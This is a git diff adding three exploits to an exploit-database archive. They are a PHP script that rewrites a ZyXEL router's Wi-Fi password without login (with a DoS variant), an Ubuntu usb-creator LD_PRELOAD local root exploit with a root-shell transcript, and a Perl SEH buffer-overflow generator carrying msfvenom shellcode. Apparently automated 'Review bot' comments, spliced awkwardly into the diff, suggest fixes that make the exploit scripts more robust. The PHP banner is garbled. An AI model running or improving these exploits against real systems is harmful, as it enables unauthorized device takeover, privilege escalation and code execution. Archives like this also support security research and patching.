diff --git a/files.csv b/files.csv
index e216bb909..dde916fb1 100755
--- a/files.csv
+++ b/files.csv
@@ -26594,7 +26594,7 @@ id,file,description,date,author,platform,type,port
 29687,platforms/windows/remote/29687.py,"HyperBook Guestbook 1.3 GBConfiguration.DAT Hashed Password Information Disclosure Vulnerability",2007-02-28,PeTrO,windows,remote,0
 29544,platforms/php/webapps/29544.txt,"Juniper Junos J-Web - Privilege Escalation Vulnerability",2013-11-12,"Sense of Security",php,webapps,0
 29545,platforms/windows/dos/29545.rb,"Hanso Converter 2.4.0 - 'ogg' Buffer Overflow (DoS)",2013-11-12,"Necmettin COSKUN",windows,dos,0
-36816,platforms/php/webapps/36816.php,"Open-Letters Remote PHP Code Injection Vulnerability",2015-04-22,"TUNISIAN CYBER",php,webapps,80
+36816,platforms/php/webapps/36816.php,"Open-Letters - Remote PHP Code Injection Vulnerability",2015-04-22,"TUNISIAN CYBER",php,webapps,80
 29546,platforms/windows/dos/29546.rb,"Provj 5.1.5.8 - 'm3u' Buffer Overflow (PoC)",2013-11-12,"Necmettin COSKUN",windows,dos,0
 29548,platforms/windows/local/29548.rb,"VideoSpirit Lite 1.77 - (SEH) Buffer Overflow",2013-11-12,metacom,windows,local,0
 29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - (.m3u) Local Buffer Overflow (SEH/Unicode)",2013-11-12,"Mike Czumak",windows,local,0
@@ -33218,5 +33218,8 @@ id,file,description,date,author,platform,type,port
 36813,platforms/hardware/local/36813.txt,"ADB Backup Archive Path Traversal File Overwrite",2015-04-21,"Imre Rad",hardware,local,0
 36814,platforms/osx/dos/36814.c,"Mac OS X Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0
 36815,platforms/cfm/webapps/36815.txt,"BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion",2015-04-21,Portcullis,cfm,webapps,80
-36818,platforms/php/webapps/36818.php,"Wolf CMS 0.8.2 Arbitrary File Upload Exploit",2015-04-22,"CWH Underground",php,webapps,80
-36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 'm3u' SEH Buffer Overflow",2015-04-22,"Tomislav Paskalev",windows,local,0
+36818,platforms/php/webapps/36818.php,"Wolf CMS 0.8.2 - Arbitrary File Upload Exploit",2015-04-22,"CWH Underground",php,webapps,80
+36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow",2015-04-22,"Tomislav Paskalev",windows,local,0
+36820,platforms/linux/local/36820.txt,"Ubuntu usb-creator 0.2.x - Local Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0
+36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 Remote Configuration Editor / Web Server DoS",2015-04-23,"Koorosh Ghorbani",hardware,dos,80
+36826,platforms/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow",2015-04-23,ThreatActor,windows,local,0
diff --git a/platforms/hardware/dos/36825.php b/platforms/hardware/dos/36825.php
new file mode 100755
index 000000000..dc1fffb3d
--- /dev/null
+++ b/platforms/hardware/dos/36825.php
@@ -0,0 +1,58 @@
+ _ < | | | '_ \| _ <| | | | \r\n" ." | (_) | | | | | | | |_) | | | | \r\n" ." \___/ |_| |_| |_|____/|_| |_| \r\n" ." \r\n" ." \r\n";
+print $banner;
+function Post($packet,$host)
+{
+ try {
+ $curl = curl_init();
+ curl_setopt($curl, CURLOPT_URL, $host);
+ curl_setopt($curl, CURLOPT_POST, 1);
+ curl_setopt($curl, CURLOPT_POSTFIELDS, $packet);
+ curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0");
+ curl_setopt($curl, CURLOPT_REFERER, "Referer: http://192.168.1.1/cgi-bin/WLAN_General.asp");
+ curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
+ $result = curl_exec($curl);
+ curl_close($curl);
+ return $result;
+ }catch (Exception $e ){
+ echo $e->getMessage();
+ return "" ;
+ }
+}
+if(sizeof($argv) < 3) {
+ print "Usage : $argv[0] 192.168.1.1 NewWifiPassword\n";
+ exit(1);
+}
+$host = $argv[1];
+$password = urlencode($argv[2]);
+$packet= "access=0&DoScan=0&ChannelDoScan=0&WlanQosFlag=0&HtExtcha=0&IsPtGui=0&SecurityIndexOriginal=3&EnableWLAN=on&SSID_INDEX=0&EnableWLanFlag=1&CountryRegion=1&CountryRegion0=0&CountryRegion1=1&CountryRegion2=2&CountryRegion3=3&CountryRegion5=5&CountryRegion6=6&Countries_Channels=IRAN&Channel_ID=11&HideSsidFlag=0&WPACompatileFlag=WPA2PSK&EncrypType=TKIPAES&PreSecurity_Sel=WPA2PSK&Security_Sel=WPA2PSK&WLANCfgPphrase=&WEP_Key1=&DefWEPKey=1&WLANCfgPSK=$password&WLANCfgAuthenTimeout=1800&WLANCfgIdleTimeout=3600&WLANCfgWPATimer=1800&WLANCfgRadiusServerAddr=0.0.0.0&WLANCfgRadiusServerPort=1812&WLANCfgRadiusServerKey=&Qos_Sel=None&doSubmitFlag=0" ;
+$target = "http://$host/cgi-bin/WLAN_General.asp";
+if(strlen(Post($packet,$target)) > 0){
+ print "Seems Changed !";
+}else{
+ print "Humm , No Chance !";
+}
+//DoS : Post("",$target) ;
+?>
\ No newline at end of file
diff --git a/platforms/linux/local/36820.txt b/platforms/linux/local/36820.txt
new file mode 100755
index 000000000..c78fd5e7b
--- /dev/null
+++ b/platforms/linux/local/36820.txt
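Review bot: The try/catch in `Post()` is dead code — PHP's curl functions do not throw, `curl_exec()` returns `false` on a connection or timeout failure — so a transport error comes back as `false`, `strlen(false)` is 0, and the caller prints "Humm , No Chance !" exactly as it would for an empty reply. Conversely, the success test `strlen(...) > 0` reports "Seems Changed !" for any non-empty body, including an error page, so neither message says anything reliable about what the device did. Check the return value and surface the transport error before the handle is closed, e.g. `if ($result === false) { echo 'curl: ' . curl_error($curl); $result = ""; }` placed after the `curl_exec()` line, and drop the try/catch. The opening lines of this hunk (before `print $banner;`) appear garbled in this view, so the file's header and the `$banner` assignment could not be reviewed.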
@@ -0,0 +1,23 @@
+Source: http://www.openwall.com/lists/oss-security/2015/04/22/12
+Bug report: https://bugs.launchpad.net/ubuntu/vivid/+source/usb-creator/+bug/1447396
+
+Ubuntu Precise (12.04LTS) <= usb-creator: 0.2.38.3ubuntu (Patched in: 0.2.38.3ubuntu0.1)
+Ubuntu Trusty (14.04LTS) <= usb-creator 0.2.56.3ubuntu (Patched in: 0.2.56.3ubuntu0.1)
+Ubuntu Utopic (14.10) <= usb-creator 0.2.62ubuntu0.2 (Patched in: 0.2.62ubuntu0.3)
+
+$ cat > test.c
+void __attribute__((constructor)) init (void)
+{
+chown("/tmp/test", 0, 0);
+chmod("/tmp/test", 04755);
+}
+^D
+$ gcc -shared -fPIC -o /tmp/test.so test.c
+$ cp /bin/sh /tmp/test
+$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
+method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
+$ ls -l /tmp/test
+-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
+$ /tmp/test
+# id
+euid=0(root) groups=0(root)
diff --git a/platforms/windows/local/36826.pl b/platforms/windows/local/36826.pl
new file mode 100755
index 000000000..183afe48c
--- /dev/null
+++ b/platforms/windows/local/36826.pl
@@ -0,0 +1,43 @@
+#!/usr/bin/env perl
+# original p0c https://www.exploit-db.com/exploits/36465/
+# credit to TUNISIAN CYBER
+# however he was attemping to vanilla buffer overflow
+# in fact it is SEH based exploit
+# using the address 0x7C9D30D7 is limit the targets
+#which I assume belongs to OS file didn't work on win7
+#yes he did find a buffer overflow since the offset reaches ESP before SEH
+#in this app, SEH based exploits are more effective and the main vuln in this case should be SEH
+#This p0c > win 7s & 8s
+# ThreatActor at CoreRed.com
+##
+
+my $file = "p0c.wav";
+my $buff = "A" x 4116; # offset to SEH
+my $nseh = "\xeb\x06\xff\xff"; #dat 8 jmp
+my $seh = pack('V', 0x66E42A79); # 66E42A79 5E POP ESI ogg.dll
+my $nop = "\x90" x 28;
+
+#msfvenom -p windows/exec CMD=calc.exe -f perl -b '\x00\xff\x0a\x0d'
+my $shell =
+"\xda\xcd\xd9\x74\x24\xf4\xb8\x50\x99\x22\x39\x5b\x33\xc9" .
+"\xb1\x31\x31\x43\x18\x83\xc3\x04\x03\x43\x44\x7b\xd7\xc5" .
+"\x8c\xf9\x18\x36\x4c\x9e\x91\xd3\x7d\x9e\xc6\x90\x2d\x2e" .
+"\x8c\xf5\xc1\xc5\xc0\xed\x52\xab\xcc\x02\xd3\x06\x2b\x2c" .
+"\xe4\x3b\x0f\x2f\x66\x46\x5c\x8f\x57\x89\x91\xce\x90\xf4" .
+"\x58\x82\x49\x72\xce\x33\xfe\xce\xd3\xb8\x4c\xde\x53\x5c" .
+"\x04\xe1\x72\xf3\x1f\xb8\x54\xf5\xcc\xb0\xdc\xed\x11\xfc" .
+"\x97\x86\xe1\x8a\x29\x4f\x38\x72\x85\xae\xf5\x81\xd7\xf7" .
+"\x31\x7a\xa2\x01\x42\x07\xb5\xd5\x39\xd3\x30\xce\x99\x90" .
+"\xe3\x2a\x18\x74\x75\xb8\x16\x31\xf1\xe6\x3a\xc4\xd6\x9c" .
+"\x46\x4d\xd9\x72\xcf\x15\xfe\x56\x94\xce\x9f\xcf\x70\xa0" .
+"\xa0\x10\xdb\x1d\x05\x5a\xf1\x4a\x34\x01\x9f\x8d\xca\x3f" .
+"\xed\x8e\xd4\x3f\x41\xe7\xe5\xb4\x0e\x70\xfa\x1e\x6b\x8e" .
+"\xb0\x03\xdd\x07\x1d\xd6\x5c\x4a\x9e\x0c\xa2\x73\x1d\xa5" .
+"\x5a\x80\x3d\xcc\x5f\xcc\xf9\x3c\x2d\x5d\x6c\x43\x82\x5e" .
+"\xa5\x20\x45\xcd\x25\x89\xe0\x75\xcf\xd5";
+
+open($FILE,">$file");
+print $FILE $buff.$nseh.$seh.$nop.$shell;
+close($FILE);
+print "+++++++++++++++++++\n";
+
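Review bot: The output file is written through an undeclared global `$FILE` with a two-argument, unchecked `open` near the end of the hunk, and the script has no `use strict; use warnings;`, so a failed open (unwritable directory, file in use) is silent and the closing `print` line runs regardless. Use the three-argument form with a lexical handle and check `close`, since buffered write errors only surface there: `open my $fh, '>:raw', $file or die "open $file: $!";` / `print {$fh} $buff . $nseh . $seh . $nop . $shell;` / `close $fh or die "close $file: $!";`. The `:raw` layer also states explicitly that the output is binary, which the `\x..` string literals otherwise leave implicit. The `$seh` line's comment names the library the address came from; a one-line note on which product version that module ships with would help readers judge the comment block's claim about affected OS versions, which the code itself does not establish.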